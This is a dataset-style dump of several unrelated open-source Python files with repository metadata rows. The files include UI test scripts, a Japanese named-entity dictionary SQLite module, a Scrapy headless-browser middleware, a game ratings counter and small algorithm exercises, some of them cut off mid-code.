pmap = PropMap(tmap)
#print("tmap: {}".format(tmap))
#print("pmap: {}".format(pmap))
pmap.dump()
print("")
print("pmap is a {}".format(pmap.__class__))
print("pmap[k3] is a {}".format(pmap["k3"].__class__))
pmap["k9.k9a.k9b"] = "v9"
print("index k1: {}".format(pmap["k1"]))
# print("index kk: {}".format(pmap["kk"]))
print("index k3.k3a: {}".format(pmap["k3.k3a"]))
print("index k4.k4a.k4b: {}".format(pmap["k4.k4a.k4b"]))
try:
print("index k1: {}".format(pmap["k1"]))
except KeyError as ex:
print("ex: {}".format(ex))
print("pmap.items():")
for (k,v) in pmap.items():
print(" {}: {}".format(k, v))
print("pmap.flatten():")
flat = pmap.flatten()
for (k,v) in flat:
print(" {}: {}".format(k, v))
print("")
pmap.dump()
| [
"eg-git@elfwerks.org"
] | eg-git@elfwerks.org |
f7e67e7c06dad3c32e3885a4e2fbdb29ab4a0a3b | 7986ec6498e3f93967fa9bfe2b6a9d4056138293 | /Protheus_WebApp/Modules/SIGATMK/TMKA061TESTCASE.py | 7e8672d16dbf8b96c9b30b4da09dadec36a8bae0 | [
"MIT"
] | permissive | HelenaAdrignoli/tir-script-samples | 7d08973e30385551ef13df15e4410ac484554303 | bb4f4ab3a49f723216c93f66a4395e5aa328b846 | refs/heads/master | 2023-02-21T11:26:28.247316 | 2020-04-28T16:37:26 | 2020-04-28T16:37:26 | 257,304,757 | 0 | 0 | MIT | 2020-04-20T14:22:21 | 2020-04-20T14:22:20 | null | UTF-8 | Python | false | false | 2,189 | py | from tir import Webapp
import unittest
class TMKA061(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGATMK','13/04/2020','T1','D MG 01 ','13')
inst.oHelper.Program('TMKA061')
def test_TMKA061_001(self):
self.oHelper.SetButton("Outras Ações","Assistente")
self.oHelper.SetButton("OK")
self.oHelper.ClickLabel("Lista de Contato")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("Vendas")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("1 - Clientes")
self.oHelper.SetButton("Avançar")
self.oHelper.SetValue("Data Ultima Compra ?", "")
self.oHelper.SetValue("Data Ultima Visita ?", "")
self.oHelper.SetButton("OK")
self.oHelper.ClickLabel("Detalhada")
self.oHelper.SetButton("Avançar")
self.oHelper.SetValue("Nível do Contato ?", "")
self.oHelper.SetValue("Perfil do Contato ?", "Nao Avalia")
self.oHelper.SetValue("Ligacões não executadas ?", "Nao Considera")
self.oHelper.SetValue("A partir de quando ?", "31/12/2004")
self.oHelper.SetValue("Ignora os dias da semana ?", "")
self.oHelper.SetButton("OK")
self.oHelper.ClickLabel("Voz")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("Comercial 1")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("Lista Aberta")
self.oHelper.SetButton("Avançar")
self.oHelper.SetValue("Nome Lista", "Lista Contatos Vendas- TIR")
self.oHelper.SetValue("Servico SLA", "")
self.oHelper.SetKey("TAB")
self.oHelper.SetValue("Número máximo de Itens por Lista:", "000999")
self.oHelper.SetButton("Avançar")
self.oHelper.SetButton("Avançar")
self.oHelper.SetButton("Avançar")
self.oHelper.SetButton("Finalizar")
self.oHelper.SetButton("Sim")
self.oHelper.SetButton("OK")
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main() | [
"hadrignoli@gmail.com"
] | hadrignoli@gmail.com |
ac807123982efe2f51ec607a6061f29be805c9f8 | 8ffb0b95591bd82df42335315b9595274740aca4 | /models/earthworm/leftover/earthworm_output.py | e0acabafbc13c8fffc4c7805920a5d9629973909 | [] | no_license | batwalrus76/ubertool_eco | 507cf5ef5a0f91f3a36a03d26d80783c3b517e79 | ed2863e37ee6066ccdfafa20f6fec3ba4f75f2d1 | refs/heads/master | 2021-01-18T10:23:27.810117 | 2015-03-24T14:50:05 | 2015-03-24T14:50:05 | 32,412,353 | 0 | 0 | null | 2015-03-17T18:30:11 | 2015-03-17T18:30:10 | null | UTF-8 | Python | false | false | 2,473 | py | # -*- coding: utf-8 -*-
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from uber import uber_lib
import numpy as np
import cgi
import cgitb
cgitb.enable()
from earthworm import earthworm_model, earthworm_tables
import sys
sys.path.append("../earthworm")
from uber import uber_lib
import rest_funcs
import logging
logger = logging.getLogger('earthworm')
class earthwormOutputPage(webapp.RequestHandler):
def post(self):
form = cgi.FieldStorage()
k_ow = float(form.getvalue('k_ow'))
l_f_e = float(form.getvalue('l_f_e'))
c_s = float(form.getvalue('c_s'))
k_d = float(form.getvalue('k_d'))
p_s = float(form.getvalue('p_s'))
c_w = float(form.getvalue('c_w'))
m_w = float(form.getvalue('m_w'))
p_e = float(form.getvalue('p_e'))
earthworm_obj = earthworm_model.earthworm(True,True,k_ow,l_f_e,c_s,k_d,p_s,c_w,m_w,p_e)
# logger.info(vars(earthworm_obj))
text_file = open('earthworm/earthworm_description.txt','r')
x = text_file.read()
templatepath = os.path.dirname(__file__) + '/../templates/'
ChkCookie = self.request.cookies.get("ubercookie")
html = uber_lib.SkinChk(ChkCookie, "Earthworm Output")
html = html + template.render(templatepath + '02uberintroblock_wmodellinks.html', {'model':'earthworm','page':'output'})
html = html + template.render (templatepath + '03ubertext_links_left.html', {})
html = html + template.render(templatepath + '04uberoutput_start.html', {
'model':'earthworm',
'model_attributes':'Earthworm Output'})
html = html + earthworm_tables.timestamp(earthworm_obj)
html = html + earthworm_tables.table_all(earthworm_obj)
html = html + template.render(templatepath + 'export.html', {})
html = html + template.render(templatepath + '04uberoutput_end.html', {})
html = html + template.render(templatepath + '06uberfooter.html', {'links': ''})
rest_funcs.save_dic(html, earthworm_obj.__dict__, "earthworm", "single")
self.response.out.write(html)
app = webapp.WSGIApplication([('/.*', earthwormOutputPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
| [
"hongtao510@gmail.com"
] | hongtao510@gmail.com |
cda5bf2dba75c987106ec62af214b96ca5667188 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /870.advantage-shuffle.python3.py | 362f8e0a67857cb39a5b44204dba1afd05679778 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | #
# [901] Advantage Shuffle
#
# https://leetcode.com/problems/advantage-shuffle/description/
#
# algorithms
# Medium (40.29%)
# Total Accepted: 7.5K
# Total Submissions: 18.5K
# Testcase Example: '[2,7,11,15]\n[1,10,4,11]'
#
# Given two arrays A and B of equal size, the advantage of A with respect to B
# is the number of indices i for which A[i] > B[i].
#
# Return any permutation of A that maximizes its advantage with respect to
# B.
#
#
#
#
# Example 1:
#
#
# Input: A = [2,7,11,15], B = [1,10,4,11]
# Output: [2,11,7,15]
#
#
#
# Example 2:
#
#
# Input: A = [12,24,8,32], B = [13,25,32,11]
# Output: [24,32,8,12]
#
#
#
#
# Note:
#
#
# 1 <= A.length = B.length <= 10000
# 0 <= A[i] <= 10^9
# 0 <= B[i] <= 10^9
#
#
#
#
#
class Solution:
def advantageCount(self, A, B):
"""
:type A: List[int]
:type B: List[int]
:rtype: List[int]
"""
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
89f4deab11dc827abf63d32d7e4af23a4e08f4ab | b031132a8ca2727827f6b1bb75f5839d327885bf | /bookworm/api/forms.py | 8b7049f862db44ea99c9d7d43892d1a1cb2ecc0a | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | erochest/threepress-rdfa | 3441ba9f272bad439b9689968cd1f668fae5c4f6 | f07e10da8a4927ab21084f4ba015d6567e665cae | refs/heads/master | 2021-07-16T21:24:00.356147 | 2011-06-10T20:42:14 | 2011-06-10T20:42:14 | 1,845,226 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | from django import forms
class APIUploadForm(forms.Form):
epub_data = forms.FileField()
api_key = forms.CharField(max_length=255)
| [
"none@none"
] | none@none |
4d90b9ba43f5cf53dd31827df98d8a68ea8fa9cb | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/scattercarpet/marker/_anglesrc.py | 3d469a500245c6cb620654f07d276ace9b20b460 | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 424 | py | import _plotly_utils.basevalidators
class AnglesrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="anglesrc", parent_name="scattercarpet.marker", **kwargs
):
super(AnglesrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs,
)
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
236f18e6d06d06f7411c509b2804609daba2be41 | 0ca5780b8a121b90e2191d7e394e35f49ab68828 | /tools/ratings.py | e6cc4467ebefa6bfa5fde9a97a901f84d3d5d6b0 | [
"MIT"
] | permissive | Ghloin/tweeria | 805091a40a2625f4983b960ccd477af6ffb1c1ba | 5f7cf917a6e08f15cd914c11823dbd81c11b95a1 | refs/heads/master | 2021-01-21T05:59:24.279175 | 2015-04-11T23:49:09 | 2015-04-11T23:49:09 | 33,859,414 | 1 | 0 | null | 2015-04-13T09:22:40 | 2015-04-13T09:22:39 | null | UTF-8 | Python | false | false | 8,313 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This is rating counter
# author: Alex Shteinikov
import __init__
import settings
import time
import random
tweenk_core = settings.core()
tweenk_balance = settings.balance()
import db
import logger
import time
class ratingsCounter:
K1 = 0.02
K2 = 1.5
K_kill = 100
RD = 25
mongo = db.mongoAdapter()
balance = settings.balance()
core = settings.core()
log = logger.logger('logs/system_events.log')
def __init__(self):
pass
def countUserRatings(self):
def countTheUserRating(sort_field, result_field):
self.players.sort(key=lambda x: x[sort_field])
self.players.reverse()
place = 1
for player in self.players:
if 'banned' in player and player['banned']:
player.update({result_field: 100500})
else:
player.update({result_field: place})
place += 1
starttime = time.time()
for player in self.players:
# Умножаем уровень на 100 млн и прибавляем опыт
# чтобы два раза не сравнивать (по уровню и по опыту)
# а учитывать общее значение
player.update({'rating':player['lvl']*100000000+player['exp']})
# Если нет информации о том сколько твитов игрока за день получено
# то считаем 0
if not 'today_parsed_tweets' in player:
player.update({'today_parsed_tweets': 0})
# Если нет информации о том сколько pvp points игрок за день набрал
# то считаем что все (что вчера у него было 0 очков)
if not 'prev_day_pvp' in player:
player.update({'pvp_per_day': player['pvp_score']})
else:
player.update({'pvp_per_day': player['pvp_score'] - player['prev_day_pvp']})
# Считаем рейтинг игрока по метрикам
global_metric = 0
if player['lvl'] == 1:
global_metric = 0
else:
if 'metrics' in player:
if 'monster_kill' in player['metrics']:
for hour in player['metrics']['monster_kill']:
global_metric += (self.balance.max_lvl-player['metrics']['monster_kill'][hour]['lvl']*self.K2)*self.K1*self.K_kill*player['metrics']['monster_kill'][hour]['value']
else:
global_metric = 0
try:
if player['ratings']['trending_position'] <= 10:
if player['ratings']['trending_position'] <= 3:
global_metric = global_metric * 0.7
elif player['ratings']['trending_position'] <= 7:
global_metric = global_metric * 0.8
else:
global_metric = global_metric * 0.9
except Exception:
pass
global_metric = global_metric + global_metric/100 * random.randint(0,self.RD)
player.update({'trending_score': global_metric})
# Считаем место игрока в глобальном рейтинге игроков по опыту,
# Если уровень одинаковый, то выше в рейтинге тот, у кого больше опыта
countTheUserRating('rating', 'rating_by_exp')
# ... в общем рейтинге игроков по pvp points
countTheUserRating('pvp_score', 'rating_by_pvp')
# ... в общем рейтинге игроков по achv_points
countTheUserRating('achv_points', 'rating_by_achv_points')
# ... trending players
countTheUserRating('trending_score', 'trending_position')
for player in self.players:
record = {
'rating_by_exp': player['rating_by_exp'],
'rating_by_pvp': player['rating_by_pvp'],
'rating_by_achv_points': player['rating_by_achv_points'],
'trending_position': player['trending_position'],
'trending_score': player['trending_score']
}
self.mongo.update('players', {'_id':player['_id']}, {'ratings':record})
message = 'Player ratings was counted by '+str(time.time()-starttime)+' seconds'
self.log.write(message)
print message
def countGuildRatings(self):
def countGuildRating(field):
self.guilds.sort(key=lambda x: x[field])
self.guilds.reverse()
place = 1
for guild in self.guilds:
guild.update({field: place})
place += 1
starttime = time.time()
for guild in self.guilds:
guild.update({
'buff_global_metric': 0,
'buff_rating': 0,
'buff_pvp': 0,
'pvp_score': 0,
})
query = []
for id in guild['people']:
query.append({'_id':id})
members = self.mongo.getu('players', search = {'$or':query}, fields = {'lvl':1, 'pvp_score':1, 'ratings':1})
for player in members:
try:
guild['buff_global_metric'] += player['ratings']['trending_score']
guild['buff_rating'] += player['lvl']
guild['buff_pvp'] += player['pvp_score']
except Exception:
pass
if len(members)<5:
guild['buff_global_metric'] = 0
guild['pvp_score'] = int(guild['buff_pvp'])
# Считает место гильдии в глобальном рейтинге гильдии
# по сумме уровня членов гильдии
countGuildRating('buff_rating')
# ... sum trending members
countGuildRating('buff_global_metric')
# .. по общему pvp_score участников
countGuildRating('buff_pvp')
for guild in self.guilds:
record = {
'rating_place_members_lvl': guild['buff_rating'],
'rating_place_members_pvp': guild['buff_pvp'],
'trending_position': guild['buff_global_metric'],
'pvp_score': guild['pvp_score']
}
self.mongo.update('guilds',{'_id':guild['_id']}, {'ratings':record})
message = 'Guilds ratings was counted by '+str(time.time()-starttime)+' seconds'
self.log.write(message)
print message
def countAll(self):
self.players = self.mongo.getu('players', {'banned':{'$exists':False}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1, 'ratings':1})
self.banned_players = self.mongo.getu('players', {'banned':{'$exists':True}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1})
self.guilds = self.mongo.getu('guilds',{},{'id':1, 'name':1, 'people':1})
self.countUserRatings()
self.countGuildRatings()
for player in self.banned_players:
record = {
'rating_by_exp': 100500,
'rating_by_pvp': 100500,
'rating_by_achv_points': 100500,
'trending_position': 100500,
'trending_score': 0
}
self.mongo.update('players', {'_id':player['_id']}, record)
self.exit()
def countGameStatistics(self):
count_players = []
for index in range(0, len(self.balance.faction)):
query = {'faction': index, '$or': [{'race': 0}, {'race':1}]}
count_players.append(self.mongo.count('players', query))
count_avg_level = [0,0,0]
players = self.mongo.getu('players', {}, {'lvl':1, 'faction':1})
for player in players:
count_avg_level[player['faction']] += player['lvl']
for index in range(0, len(self.balance.faction)):
try:
count_avg_level[index] = float(int(float(count_avg_level[index]) / count_players[index] * 10))/10
except Exception:
count_avg_level[index] = 0.0
current_time = time.localtime()
hashkey = str(current_time.tm_year) + str(current_time.tm_yday)
lastday_stat = self.mongo.find('game_statistics', {'type': 'lastday_avg_level'})
if not lastday_stat or time.localtime().tm_hour > 20 and not lastday_stat['hashkey'] == hashkey:
self.mongo.update('game_statistics', {'type': 'lastday_avg_level'}, {'type': 'lastday_avg_level', 'data': count_avg_level, 'hashkey': hashkey}, True)
self.mongo.update('game_statistics', {'type': 'lastday_count'}, {'type': 'lastday_count', 'data': count_players, 'hashkey': hashkey}, True)
self.mongo.update('game_statistics', {'type': 'players_count'}, {'type': 'players_count', 'data': count_players}, True)
self.mongo.update('game_statistics', {'type': 'players_avg_level'}, {'type': 'players_avg_level', 'data': count_avg_level}, True)
def exit(self):
self.log.closeFile()
if __name__ == "__main__":
urc = ratingsCounter()
urc.countGameStatistics()
urc.countAll()
| [
"alex.shteinikov@gmail.com"
] | alex.shteinikov@gmail.com |
19ce91ea22e989da8ca864d594d02929a2b81e0f | 2ac1b9ccc4d4f7f646a33e5646ed5e182ae85727 | /jamdict/jmnedict_sqlite.py | 06df43e4840531842c7f6bb7bd7887641f3844a0 | [
"MIT"
] | permissive | killawords/jamdict | 3655185f7097365b184b7979a112469430c4179f | 85c66c19064977adda469e3d0facf5ad9c8c6866 | refs/heads/main | 2023-05-28T22:00:00.813811 | 2021-06-06T04:04:03 | 2021-06-06T04:04:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,061 | py | # -*- coding: utf-8 -*-
"""
Japanese Multilingual Named Entity Dictionary (JMnedict) in SQLite format
References:
ENAMDICT/JMnedict - Japanese Proper Names Dictionary Files
https://www.edrdg.org/enamdict/enamdict_doc.html
"""
# This code is a part of jamdict library: https://github.com/neocl/jamdict
# :copyright: (c) 2020 Le Tuan Anh <tuananh.ke@gmail.com>
# :license: MIT, see LICENSE for more details.
import os
import logging
from typing import Sequence
from puchikarui import Schema
from . import __version__ as JAMDICT_VERSION, __url__ as JAMDICT_URL
from .jmdict import Meta, JMDEntry, KanjiForm, KanaForm, Translation, SenseGloss
# -------------------------------------------------------------------------------
# Configuration
# -------------------------------------------------------------------------------
MY_FOLDER = os.path.dirname(os.path.abspath(__file__))
SCRIPT_FOLDER = os.path.join(MY_FOLDER, 'data')
JMNEDICT_SETUP_FILE = os.path.join(SCRIPT_FOLDER, 'setup_jmnedict.sql')
JMNEDICT_VERSION = '1.08'
JMNEDICT_URL = 'https://www.edrdg.org/enamdict/enamdict_doc.html'
JMNEDICT_DATE = '2020-05-29'
JMNEDICT_SETUP_SCRIPT = '''INSERT INTO meta VALUES ('jmnedict.version', '{jv}');
INSERT INTO meta VALUES ('jmnedict.url', '{ju}');
INSERT INTO meta VALUES ('jmnedict.date', '{jud}');
INSERT INTO meta SELECT 'generator', 'jamdict' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator');
INSERT INTO meta SELECT 'generator_version', '{gv}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_version');
INSERT INTO meta SELECT 'generator_url', '{gu}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_url');'''.format(
jv=JMNEDICT_VERSION,
ju=JMNEDICT_URL,
jud=JMNEDICT_DATE,
gv=JAMDICT_VERSION,
gu=JAMDICT_URL
)
def getLogger():
return logging.getLogger(__name__)
# -------------------------------------------------------------------------------
# Models
# -------------------------------------------------------------------------------
class JMNEDictSchema(Schema):
def __init__(self, db_path, *args, **kwargs):
super().__init__(db_path, *args, **kwargs)
self.add_script(JMNEDICT_SETUP_SCRIPT)
self.add_file(JMNEDICT_SETUP_FILE)
# Meta
self.add_table('meta', ['key', 'value'], proto=Meta).set_id('key')
self.add_table('NEEntry', ['idseq'])
# Kanji
self.add_table('NEKanji', ['ID', 'idseq', 'text'])
# Kana
self.add_table('NEKana', ['ID', 'idseq', 'text', 'nokanji'])
# Translation (~Sense of JMdict)
self.add_table('NETranslation', ['ID', 'idseq'])
self.add_table('NETransType', ['tid', 'text'])
self.add_table('NETransXRef', ['tid', 'text'])
self.add_table('NETransGloss', ['tid', 'lang', 'gend', 'text'])
class JMNEDictSQLite(JMNEDictSchema):
def __init__(self, db_path, *args, **kwargs):
super().__init__(db_path, *args, **kwargs)
def all_ne_type(self, ctx=None):
if ctx is None:
return self.all_ne_type(ctx=self.ctx())
else:
return [x['text'] for x in ctx.execute("SELECT DISTINCT text FROM NETransType")]
def _build_ne_search_query(self, query):
_is_wildcard_search = '_' in query or '@' in query or '%' in query
if _is_wildcard_search:
where = "idseq IN (SELECT idseq FROM NEKanji WHERE text like ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text like ?)"
else:
where = "idseq IN (SELECT idseq FROM NEKanji WHERE text == ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text == ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text == ?) or idseq in (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text == ?)"
params = [query, query, query, query]
try:
if query.startswith('id#'):
query_int = int(query[3:])
if query_int >= 0:
where = "idseq = ?"
params = [query_int]
except Exception:
pass
getLogger().debug(f"where={where} | params={params}")
return where, params
def search_ne(self, query, ctx=None, **kwargs) -> Sequence[JMDEntry]:
if ctx is None:
with self.ctx() as ctx:
return self.search_ne(query, ctx=ctx)
where, params = self._build_ne_search_query(query)
where = 'SELECT idseq FROM NEEntry WHERE ' + where
entries = []
for (idseq,) in ctx.conn.cursor().execute(where, params):
entries.append(self.get_ne(idseq, ctx=ctx))
return entries
def search_ne_iter(self, query, ctx=None, **kwargs):
if ctx is None:
with self.ctx() as ctx:
return self.search_ne(query, ctx=ctx)
where, params = self._build_ne_search_query(query)
where = 'SELECT idseq FROM NEEntry WHERE ' + where
for (idseq,) in ctx.conn.cursor().execute(where, params):
yield self.get_ne(idseq, ctx=ctx)
def get_ne(self, idseq, ctx=None) -> JMDEntry:
# ensure context
if ctx is None:
with self.ctx() as new_context:
return self.get_entry(idseq, new_context)
# else (a context is provided)
# select entry & info
entry = JMDEntry(idseq)
# select kanji
kanjis = ctx.NEKanji.select('idseq=?', (idseq,))
for dbkj in kanjis:
kj = KanjiForm(dbkj.text)
entry.kanji_forms.append(kj)
# select kana
kanas = ctx.NEKana.select('idseq=?', (idseq,))
for dbkn in kanas:
kn = KanaForm(dbkn.text, dbkn.nokanji)
entry.kana_forms.append(kn)
# select senses
senses = ctx.NETranslation.select('idseq=?', (idseq,))
for dbs in senses:
s = Translation()
# name_type
nts = ctx.NETransType.select('tid=?', (dbs.ID,))
for nt in nts:
s.name_type.append(nt.text)
# xref
xs = ctx.NETransXRef.select('tid=?', (dbs.ID,))
for x in xs:
s.xref.append(x.text)
# SenseGloss
gs = ctx.NETransGloss.select('tid=?', (dbs.ID,))
for g in gs:
s.gloss.append(SenseGloss(g.lang, g.gend, g.text))
entry.senses.append(s)
return entry
def insert_name_entities(self, entries, ctx=None):
# ensure context
if ctx is None:
with self.ctx() as new_context:
return self.insert_name_entities(entries, ctx=new_context)
# else
for entry in entries:
self.insert_name_entity(entry, ctx)
def insert_name_entity(self, entry, ctx=None):
# ensure context
if ctx is None:
with self.ctx() as ctx:
return self.insert_name_entity(entry, ctx=ctx)
# else (a context is provided)
self.NEEntry.insert(entry.idseq, ctx=ctx)
# insert kanji
for kj in entry.kanji_forms:
ctx.NEKanji.insert(entry.idseq, kj.text)
# insert kana
for kn in entry.kana_forms:
ctx.NEKana.insert(entry.idseq, kn.text, kn.nokanji)
# insert translations
for s in entry.senses:
tid = ctx.NETranslation.insert(entry.idseq)
# insert name_type
for nt in s.name_type:
ctx.NETransType.insert(tid, nt)
# xref
for xr in s.xref:
ctx.NETransXRef.insert(tid, xr)
# Gloss
for g in s.gloss:
ctx.NETransGloss.insert(tid, g.lang, g.gend, g.text)
| [
"tuananh.ke@gmail.com"
] | tuananh.ke@gmail.com |
9582722a0a7a9d3283bbfeee9cb7ddad8e6c377f | 67117705720a3e3d81253ba48c1826d36737b126 | /Wk9_STRANDS/integrate.py | 42e4a34b47cb63349193c1740e61a7048b7bc760 | [] | no_license | pyliut/Rokos2021 | 41f0f96bc396b6e8a5e268e31a38a4a4b288c370 | 70753ab29afc45766eb502f91b65cc455e6055e1 | refs/heads/main | 2023-08-13T17:29:30.013829 | 2021-09-26T19:01:35 | 2021-09-26T19:01:35 | 382,092,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 28 15:05:28 2021
@author: pyliu
"""
import numpy as np
def integrate(integrand,spacing):
"""
Numerical integration using rectangles
Parameters
----------
integrand : FLOAT, vector
Values of integrand in the range of integration
spacing : FLOAT, scalar
Width of integrating strips
Returns
-------
FLOAT, scalar
Integrated value
"""
return np.sum(integrand)*spacing | [
"noreply@github.com"
] | pyliut.noreply@github.com |
9c356ecfd41e1d77531a0992d3aeeab8306f56b4 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/imooc/middlewares.py | d2bed55b4f0789f23a3e7d00661f72239c8ef9df | [] | no_license | enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,174 | py | from scrapy.http import HtmlResponse, Request, Response
from scrapy.exceptions import IgnoreRequest
from multiprocessing import Process, Pipe
from ghost import Ghost
class GhostAction:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def do(self, session):
return self.action(session, *self.args, **self.kwargs)
def action(self, session, *args, **kwargs):
raise NotImplementedError
class DefaultOpenAction(GhostAction):
def action(self, session, request):
page, extra_resources = \
session.open(request.url, headers=request.headers)
if request.action:
request.action.do(session)
page_, extra_resources_ = session.wait_for_page_loaded()
if page_:
page, extra_resources = page_, extra_resources_
return page
class GhostRequest(Request):
def __init__(self, url=None, action=None, \
session=None, isLast=False, *args, **kwargs):
if not url:
assert session
url = session.currentUrl
super(GhostRequest, self).__init__(url, *args, dont_filter=True, **kwargs)
self._action = action
self._isLast = isLast
self._session = session
@property
def session(self):
return self._session
@property
def action(self):
return self._action
@property
def isLast(self):
return self._isLast
class GhostResponse(HtmlResponse):
def __init__(self, request, session):
self.request = request
self.session = session
def waitForInit(self):
res = self.session.waitForResult()
if res:
super(GhostResponse, self).__init__(request=self.request, **res)
class GhostMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
return GhostMiddleware()
def process_request(self, request, spider):
if isinstance(request, GhostRequest):
if request.session:
session = request.session
action = request.action
else:
session = GhostSession()
action = DefaultOpenAction(request)
session.commitAction(action, wait=False)
if request.isLast:
session.exit()
return GhostResponse(request, session)
def process_response(self, request, response, spider):
if isinstance(response, GhostResponse):
response.waitForInit()
return response
class GhostSession:
def __init__(self):
# for the request without url
self._currentUrl = None
self.pipe, pipe = Pipe()
self.startGhostProcess(pipe)
def startGhostProcess(self, pipe):
GhostProcess(pipe).start()
def commitAction(self, action, wait=True):
self.pipe.send(action)
if wait:
self.wait()
def waitForResult(self):
res = self.pipe.recv()
self._currentUrl = res['url']
return res
def exit(self):
self.commitAction(None, False)
@property
def currentUrl(self):
return self._currentUrl
class GhostProcess(Process):
def __init__(self, pipe):
super().__init__()
self.pipe = pipe
self.currentPage = None
def sendResult(self, session, page):
res = {
'url': page.url,
'status': page.http_status,
'headers': page.headers,
'body': session.content.encode('utf-8'),
}
self.pipe.send(res)
def updatePage(self, session, page):
if not page:
page, extra_resources = session.wait_for_page_loaded()
if page:
self.currentPage = page
def run(self):
ghost = Ghost()
with ghost.start(download_images=False) as session:
while True:
action = self.pipe.recv()
if action is None:
break
page = action.do(session)
self.updatePage(session, page)
self.sendResult(session, self.currentPage)
| [
"yaolihui0506"
] | yaolihui0506 |
bb0cc5db2017fd3d697c4422d606f0f9508bb1cf | 9e42f3e16f46ae9161490d459adff263a083b5d8 | /ps5.2.py | c7d9e436fb5328bda9b4482482a800516e3687b0 | [] | no_license | rajshakerp/algorithm_crunching_social_network | ba7dd2d7ff748cb9b7e7e93c151285b9c2c2c575 | 2d197a199ea6bb19d65c82a65d72553be107a369 | refs/heads/master | 2020-06-12T08:03:48.949142 | 2014-06-24T21:14:53 | 2014-06-24T21:14:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,460 | py | # compute the weight of co-appear
import csv
import operator
import heapq
def make_link(G, name, book):
if name not in G:
G[name] = {}
(G[name])[book] = 1
if book not in G:
G[book] = {}
(G[book])[name] = 1
return G
def read_graph(filename):
# Read an undirected graph in CSV format. Each line is an edge
tsv = csv.reader(open(filename), delimiter='\t')
G = {}
characters = {}
for (node1, node2) in tsv:
make_link(G, node1, node2)
if node1 not in characters:
characters[node1] = 1
return G, characters
def HG_make_link(CG, ch1, ch2):
if ch1 not in CG:
CG[ch1] = {}
if ch2 not in CG:
CG[ch2] = {}
if ch2 not in CG[ch1]:
CG[ch1][ch2] = 0
if ch1 not in CG[ch2]:
CG[ch2][ch1] = 0
CG[ch1][ch2] += 1
CG[ch2][ch1] += 1
def make_hop_graph(G, characters):
HG = {}
for ch1 in characters:
for book in G[ch1]:
for ch2 in G[book]:
# avoid double counting the route quantities
if ch1 > ch2: HG_make_link(HG, ch1, ch2)
return HG
def WG_make_link(HG, WG, ch1, ch2, routes):
routes[ch1], WG[ch1] = dijkstra(HG, ch1)
def make_weight_graph(HG, characters):
WG = {}
routes = {}
for ch1 in HG:
for ch2 in HG[ch1]:
if ch1 > ch2: WG_make_link(HG, WG, ch1, ch2, routes)
return WG, routes
# should compute the entire route: len([v, b, c, e])
def dijkstra(HG, v):
heap = [(0, v)]
dist_so_far = {v: 0}
route_cnt = {v: 0}
final_dist = {}
while dist_so_far:
(w, k) = heapq.heappop(heap)
if k in final_dist or (k in dist_so_far and w > dist_so_far[k]):
continue
else:
del dist_so_far[k]
final_dist[k] = w
